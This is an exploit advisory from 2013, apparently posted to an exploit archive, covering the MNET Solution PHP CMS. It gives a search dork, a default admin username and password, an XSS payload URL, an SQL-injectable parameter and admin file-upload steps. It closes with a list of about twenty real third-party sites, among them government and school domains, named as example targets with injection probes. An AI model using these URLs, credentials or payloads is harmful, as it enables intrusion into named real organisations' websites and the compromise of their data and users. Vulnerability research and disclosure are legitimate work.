MNET Solution XSS / SQL Injection / File Upload

#Title : MNET Solution Multiple Vulnerabilities

#Author : DevilScreaM

#Date : 10/19/2013

#Category : Web Applications

#Type : PHP

#Vendor : http://mnet.co.th

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
 	  Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload

#Dork : inurl:webboard.php?option=answers


Default Admin Password

http://site-target/siteadmin/

Username : superadmin
Password : jocho

====================================================================================================

Cross Site Scripting

http://site-target/[PATH]/subindex.php?page=search&kword=[XSS]

Example at Web Vendor

http://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>

====================================================================================================

SQL Injection Vulnerability

Vulnerable at 'webboard.php'

http://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]

====================================================================================================

HTML Injection

Register to WebBoard, after Register, Create New Post

Go to http://site-target/[PATH]/webboard.php?#post


#NOTE

Register Page : http://site-target/subindex.php?page=member&task=new


====================================================================================================

Arbitrary File Upload

1. Login to Page Admin

2. After Login, go to http://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

3. Click Upload, And Upload Your HTML

4. Result Upload at

http://site-target/upfile/[YOURFILE].html

http://site-target/images/[YOURFILE].html

======================================================================================================

Example Target

http://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'
http://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'
http://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'
http://pujud.go.th/main/webboard.php?option=answers&qNo=20'
http://npm.ac.th/en/webboard.php?option=answers&qNo=3'
http://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'
http://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'
http://halal.or.th/th/main/webboard.php?option=answers&qNo=20'
http://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'
http://startec.co.th/main/webboard.php?option=answers&qNo=13'
http://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'
http://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'
http://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'
http://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'
http://halalscience.org/en/main/webboard.php?option=answers&qNo=2'
http://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'
http://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'
http://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'
http://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'
http://st-arabian.com/main/webboard.php?option=answers&qNo=43'
http://thaipaki.com/main/webboard.php?option=answers&qNo=47'
http://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'